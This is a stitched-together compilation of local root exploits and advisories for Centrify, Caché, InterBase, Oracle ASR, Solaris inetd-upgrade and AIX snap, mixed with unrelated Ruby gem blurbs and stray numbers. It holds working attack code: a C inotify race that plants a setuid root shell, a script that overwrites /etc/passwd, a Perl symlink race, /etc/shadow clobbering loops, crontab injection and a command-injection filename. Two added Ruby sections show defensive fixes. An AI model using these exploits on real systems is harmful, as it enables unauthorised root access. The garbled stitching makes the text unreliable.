http://vapid.dhs.org/exploits/centrify_local_r00t.c
CVE-2012-6348 12/17/2012
http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html
Greetings vladz, Thanks for the inotify & syscall technique.
This exploit based on http://vladz.devzero.fr/010_bzexe-vuln.php
Run the exploit and wait for the administrator to analyse or deploy software
to the system.
larry@h0g:~/code/exploit$ ./cent_root centrify.cmd.0
[*] Launching attack against "centrify.cmd.0"
[+] Creating evil script (/tmp/evil)
[+] Creating target file (/bin/touch /tmp/centrify.cmd.0)
[+] Initialize inotify
[+] Waiting for root to launch "centrify.cmd.0"
[+] Opening root shell (/tmp/sh)
#
Larry W. Cashdollar
@_larry0
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <sys/inotify.h>
#include <fcntl.h>
#include <sys/syscall.h>
/*Create a small c program to pop us a root shell*/
int create_nasty_shell(char *file) {
char *s = "#!/bin/bash\n"
"echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
"cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
"chmod 4755 /tmp/sh;\n";
int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
write(fd, s, strlen(s));
close(fd);
return 0;
}
int main(int argc, char **argv) {
int fd, wd;
char buf[1], *targetpath, *cmd,
*evilsh = "/tmp/evil", *trash = "/tmp/trash";
if (argc < 2) {
printf("Usage: %s <target file> \n", argv[0]);
return 1;
}
printf("[*] Launching attack against \"%s\"\n", argv[1]);
printf("[+] Creating evil script (/tmp/evil)\n");
create_nasty_shell(evilsh);
targetpath = malloc(sizeof(argv[1]) + 6);
cmd = malloc(sizeof(char) * 32);
sprintf(targetpath, "/tmp/%s", argv[1]);
sprintf(cmd,"/bin/touch %s",targetpath);
printf("[+] Creating target file (%s)\n",cmd);
system(cmd);
printf("[+] Initialize inotify\n");
fd = inotify_init();
wd = inotify_add_watch(fd, targetpath, IN_ATTRIB);
printf("[+] Waiting for root to change perms on \"%s\"\n", argv[1]);
syscall(SYS_read, fd, buf, 1);
syscall(SYS_rename, targetpath, trash);
syscall(SYS_rename, evilsh, targetpath);
inotify_rm_watch(fd, wd);
printf("[+] Opening root shell (/tmp/sh)\n");
sleep(2);
system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
return 0;
}
88343
$ nobody> ln -s /etc/shadow adcheckDMoutput
# ls -l /etc/shadow
-r-------- 1 root root 3999 Dec 3 14:56 /etc/shadow
/etc/shadow has been overwritten with the contents of adcheckDMoutput, which is generated when software is pushed to a host via Deployment Manager. The 210 appended to the end of files in /tmp is the user's UID number.
88166
Bootstrap a machine. Install packages, create a deploy user, upload authorized keys and deploy key. Uses RVM to install desired rubies, with patch support.
108575
Caché, the post-relational database for e-applications, is optimized for the tougher demands of Web applications. It delivers breakthrough performance for massively scalable Web applications. Its rapid application development environment with advanced object technology lets you operate at Internet speed. Caché's ultra-fast SQL outperforms relational systems 20X. And its multidimensional application and data server delivers lightning-fast performance.
Intersystems Cache local root exploit. Larry W. Cashdollar http://vapid.dhs.org
Because of poor default file and directory permissions a local user can execute code as root via the Cache CSP interpreter. Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash.
filename -> cspexp.csp
<script language=Cache runat=server>
Set cdef=##class(%Library.File).%New("/etc/passwd")
Do cdef.Open("WSN")
Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash")
Do cdef.%Close()
</script>
Gem to create brbackup summary.
108901
Borland InterBase raises the bar for performance and power in small footprint databases. Designed for use in situations where there is no database administrator or IT support, InterBase is powerful enough to support mission-critical applications, yet compact enough to run on very modest systems. It can be easily transported by disk, CD, or even dial-up download. And unlike enterprise databases that require expensive ecosystems of support and maintenance, InterBase requires virtually no maintenance.
Local attackers can exploit this vulnerability to add or modify accounts in Interbase. The following C program will generate hashed passwords that can be injected into admin.ib database.
/*Larry W. Cashdollar
Vapid Labs.
Borland Interbase 7.1 password creator. lwc@vapid.dhs.org
Build with: cc interbase_pw.c -o interbase_pw -lcrypt */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <crypt.h>
#define SALT "9z"
int main (int argc, char *argv[]) {
char crypt1[64], *crypt2;
if (argc < 2) {
printf ("Borland InterBase db password tool.\n Larry Cashdollar, vapid labs\nEnter desired password as an argument\n");
exit (1);
}
/* crypt() returns a static buffer, so keep a copy of the first round before calling it again */
strncpy (crypt1, crypt (argv[1], SALT), sizeof (crypt1) - 1);
crypt1[sizeof (crypt1) - 1] = '\0';
crypt2 = crypt (&crypt1[2], SALT);
printf ("Double crypt() is: %s\n", crypt2);
printf ("Without salt (as stored in isc4.gdb/admin.ib): %s\n", &crypt2[2]);
return 0;
}
4381
BaseSpace Ruby SDK is a Ruby based Software Development Kit to be used in the development of Apps and scripts for working with Illumina's BaseSpace cloud-computing solution for next-gen sequencing data analysis. The primary purpose of the SDK is to provide an easy-to-use Ruby environment enabling developers to authenticate a user, retrieve data, and upload data/results from their own analysis to BaseSpace.
101031
It is a clone of http://rubygems.org/gems/backup with checksum added.
108569
Backup is a RubyGem, written for UNIX-like operating systems, that allows you to easily perform backup operations on both your remote and local environments. It provides you with an elegant DSL in Ruby for modeling your backups. Backup has built-in support for various databases, storage protocols/services, syncers, compressors, encryptors and notifiers which you can mix and match. It was built with modularity, extensibility and simplicity in mind.
108578
Auto Service Request (ASR) is a secure, scalable, customer-installable software feature of warranty and Oracle Support Services that provides auto-case generation when common hardware component faults occur. ASR is designed to enable faster problem resolution by eliminating the need to initiate contact with Oracle Support Services for common hardware component failures, reducing both the number of phone calls needed and overall phone time required. ASR also simplifies support operations by using electronic diagnostic data. Easily installed and deployed, ASR is completely controlled by you, the customer, to ensure security. ASR is applicable only for component faults. Not all component failures are covered, though the most common components (such as disk, fan, and power supplies) are covered.
[larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done
root executes the asr command:
[root@oracle-os-lab01 bin]# ./asr
register OR register [-e asr-manager-relay-url]: register ASR
unregister : unregister ASR
show_reg_status : show ASR registration status
test_connection : test connection to Oracle
.
.
.
version : show asr script version
exit
help : display a list of commands
? : display a list of commands
asr>
/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722:
root # cat /etc/shadow
id State Bundle
68 ACTIVE com.sun.svc.asr.sw_4.3.1
Fragments=69, 70
69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1
Master=68
70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1
Master=68
72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0
Fragments=73
73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0
Master=72
67 ACTIVE com.sun.svc.ServiceActivation_4.3.1
89823
as-1.0 is a command line interface to automate deployment and management of servers for https://www.anotherservice.com/.
ps -ef |grep runProgram
112683
Allows printing arabic to PDFs generated by prawn
myfile;id;.txt
id would be passed to the command line and executed.
104365
The mysql root password can be read out of /tmp/my.cnf.#{target_host} if a local user waits to read that after it is written and before it is removed in line 394.
It is also possible to clobber files owned by the VladTheEnterprising user process via symlink attack because the my.cnf.#{target_host} doesn't have a randomly created filename.
If this Gem is used in the context of a Rails application and the user is allowed to specify the target host, command injection can occur at line 394 if special shell metacharacters such as ; and & are injected.
108728
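The prawn and VladTheEnterprising notes above describe the same bug: an attacker-controlled string (a filename, a target host) interpolated into a command string that Ruby hands to /bin/sh. The following is an added example, not code from either gem. It uses echo as a stand-in for the real command and a constructed payload that prints INJECTED instead of running id, so it is safe to run offline; the vulnerable form is shown beside the two hardened forms (argv-style spawning, which never involves a shell, and Shellwords quoting when a shell string is unavoidable) and a structural hostname check for the target_host case. The function names and the HOSTNAME pattern are this example's own.

```ruby
require "open3"
require "shellwords"

# Constructed attacker-controlled inputs, modelled on the two notes above.
FILENAME_PAYLOAD = "myfile;echo INJECTED;.txt"    # stands in for myfile;id;.txt
HOST_PAYLOAD     = "db.example.com;echo INJECTED"  # target_host carrying a shell metacharacter

# Vulnerable: interpolating untrusted input into a single command string.
# Because the string contains metacharacters, Ruby runs it via /bin/sh -c,
# and the shell honours ; & | just as it would at an interactive prompt.
def run_vulnerable(name)
  out, _status = Open3.capture2("echo #{name}")
  out
end

# Hardened (1): argv form. Each argument goes straight to execve as one
# element; no shell is involved, so ";" is just a byte in the argument.
def run_argv(name)
  out, _status = Open3.capture2("echo", name)
  out
end

# Hardened (2): when a single shell string is unavoidable, quote every
# untrusted word so the shell treats it as one literal argument.
def run_escaped(name)
  out, _status = Open3.capture2("echo #{Shellwords.escape(name)}")
  out
end

# Hardened (3): reject input that cannot be a hostname before it reaches any
# command or file path. Pattern assumed here: DNS labels, dots, <= 253 chars.
HOSTNAME = /\A[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*\z/i

def valid_host?(host)
  host.length <= 253 && HOSTNAME.match?(host)
end

# True if the injected command actually ran (its marker appears as its own line).
def injected?(output)
  output.lines.any? { |line| line.strip == "INJECTED" }
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: injected=#{injected?(run_vulnerable(FILENAME_PAYLOAD))}"
  puts "argv:       injected=#{injected?(run_argv(FILENAME_PAYLOAD))}"
  puts "escaped:    injected=#{injected?(run_escaped(FILENAME_PAYLOAD))}"
  puts "valid_host?(#{HOST_PAYLOAD.inspect}) = #{valid_host?(HOST_PAYLOAD)}"
end
```

The argv form is the one to reach for first: it removes the shell entirely, so there is nothing left to escape. Shellwords.escape is correct but only protects the one interpolation you remembered to wrap; the allowlist check catches the bad value before it can reach a path name as well as a command, which matters for the my.cnf.#{target_host} case.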
Solaris Sparc Patch cluster
patches/137097-01/SUNWcsr/reloc/lib/svc/method/inetd-upgrade
lines :
72 inetdconf_entries_file=/tmp/iconf_entries.$$
73
74 # Create sed script that prints out inetd.conf src line from inetconv generated
75 # manifest.
76 cat <<EOF > /tmp/inetd-upgrade.$$.sed
77 /propval name='source_line'/{
78 n
79 s/'//g
80 p
81 }
82 /from the inetd.conf(4) format line/{
83 n
84 p
85 }
86 EOF
If 137097-01 is applied and changes need to be made to the inetd.conf file, a malicious local user can overwrite the contents of a root-owned file with a simple script. The temp file names above are built from $$, the PID of the inetd-upgrade shell, which is visible to every user in ps output:
#!/usr/bin/perl
# Watch the process table for the inetd-upgrade method script and, as soon as
# it appears, plant a symlink at the temp file it is about to create
# (/tmp/iconf_entries.<pid>, line 72 above) pointing at a root-owned file.
$clobber = "/etc/passwd";
while (1) {
    open(PS, "ps -ef | grep -v grep | grep -v PID |") or die "ps: $!";
    while (<PS>) {
        @args = split " ", $_;    # ps -ef columns: UID PID PPID ...; $args[1] is the PID
        if (/inetd-upgrade/) {
            print "Symlinking iconf_entries.$args[1] to $clobber\n";
            symlink($clobber, "/tmp/iconf_entries.$args[1]") or warn "symlink: $!";
            exit(1);
        }
    }
    close(PS);
}
89243
I was able to inject my own cronjob in as root with the following simple PoC:
$ while (true) ;do echo "* * * * * /tmp/rootme" >> /tmp/crontab_edit; done
[root@oracle-lnx-lab02 ~]# crontab -l
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1
* * * * * /tmp/rootme    <--- prepended and contains our malicious shell/binary, see exploit above.
##Cronjob entry for ASR Auto Rules Update
7 3 * * * /opt/SUNWswasr/bin/update_rules.sh
The uninstall script is just as sloppy:
[C] F /tmp/asrtab.??
[U] F /tmp/asrtab.??
[C] F /tmp/asrtab.???
[U] F /tmp/asrtab.???
[C] F /tmp/asrtab.???
[U] F /tmp/asrtab.???
[D] F /tmp/asrtab.??
did they mean to use $$ for process Pid?
89823
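The ASR status1_<timestamp> and crontab_edit files, the inetd-upgrade iconf_entries.$$ file and the VladTheEnterprising my.cnf.#{target_host} file in the notes above all fail the same way: a privileged process writes to a predictable name in a world-writable directory with plain create/truncate (or append) semantics, and a symlink planted there beforehand redirects the write into a root-owned file. The following is an added example, not Oracle's, Sun's or either gem's code. It builds a private sandbox directory standing in for /tmp and a file in it standing in for /etc/shadow, plants the symlink the way the attacker does, then shows the vulnerable open clobbering the target beside two hardened forms: O_CREAT|O_EXCL, which refuses to open a pre-existing path (a symlink included), and an unpredictable name created exclusively by the library, which is what mktemp(1) would give the shell scripts. Function names and the sample data are this example's own.

```ruby
require "tmpdir"
require "tempfile"
require "fileutils"

# Constructed stand-in for the root-owned target's original contents.
ORIGINAL = "root:$6$original$hash:19000:0:99999:7:::\n"

# Sandbox: a private directory plays the role of /tmp, one file in it plays
# the role of /etc/shadow (or /etc/passwd, or root's crontab).
def make_sandbox
  dir    = Dir.mktmpdir("tmpfile-demo")
  victim = File.join(dir, "shadow")
  File.write(victim, ORIGINAL)
  [dir, victim]
end

# Attacker step: plant a symlink at the name the privileged script is about
# to use (status1_<timestamp>, iconf_entries.<pid>, crontab_edit, ...).
def plant_symlink(dir, name, target)
  File.symlink(target, File.join(dir, name))
end

# Vulnerable pattern: open with create/truncate semantics, which is what
# "> /tmp/name" does in a shell script. The open follows the planted symlink
# and the data lands in the target instead of in /tmp.
def predictable_write(dir, name, data)
  File.open(File.join(dir, name), "w") { |f| f.write(data) }
end

# Hardened (1): O_CREAT|O_EXCL. The kernel refuses if anything already exists
# at that path, a symlink included (even a dangling one), so a planted link
# is detected rather than followed. Returns false when refused.
def exclusive_write(dir, name, data)
  File.open(File.join(dir, name), File::WRONLY | File::CREAT | File::EXCL, 0600) do |f|
    f.write(data)
  end
  true
rescue Errno::EEXIST
  false
end

# Hardened (2): let the library choose an unpredictable name and create it
# exclusively (mkstemp underneath), the equivalent of mktemp(1) in a script.
# Returns the path actually used.
def random_write(dir, data)
  f = Tempfile.create("status1_", dir)
  f.write(data)
  f.close
  f.path
end

# Runs the whole scenario and reports what happened to the victim file.
def demo
  dir, victim = make_sandbox
  guessed = "status1_020213003722"              # the name root's script will use
  plant_symlink(dir, guessed, victim)

  predictable_write(dir, guessed, "id State Bundle\n")
  clobbered = File.read(victim).start_with?("id State Bundle")

  File.write(victim, ORIGINAL)                   # restore before the hardened runs
  refused = !exclusive_write(dir, guessed, "id State Bundle\n")
  intact  = File.read(victim) == ORIGINAL

  path = random_write(dir, "id State Bundle\n")
  random_ok = File.basename(path) != guessed && File.read(path) == "id State Bundle\n"

  { clobbered: clobbered, excl_refused: refused, victim_intact: intact, random_ok: random_ok }
ensure
  FileUtils.remove_entry(dir) if dir
end

puts demo.inspect if __FILE__ == $PROGRAM_NAME
```

Note the difference between the two hardened forms: O_EXCL on a fixed name turns the attack into a denial of service (the script cannot proceed while the link is there), which is still far better than a root-owned file being overwritten; a random name created exclusively removes the attacker's ability to predict the path at all, and is what a shell script gets from `mktemp`. The brute-force loop in the ASR note (500 symlinks covering the guessable timestamp suffix) only works because the name is both predictable and opened without O_EXCL.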
The snap command is a diagnostic utility for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/; under /tmp/ibmsupt/general/ you will find the passwd file with the password ciphertext. The danger here is that if a system administrator executes snap -a, as is sometimes requested by IBM support while diagnosing a problem, it defeats password shadowing. Because /tmp/ibmsupt is created with 755 permissions, a local user may carry out a symlink attack and gain access to the password file.
none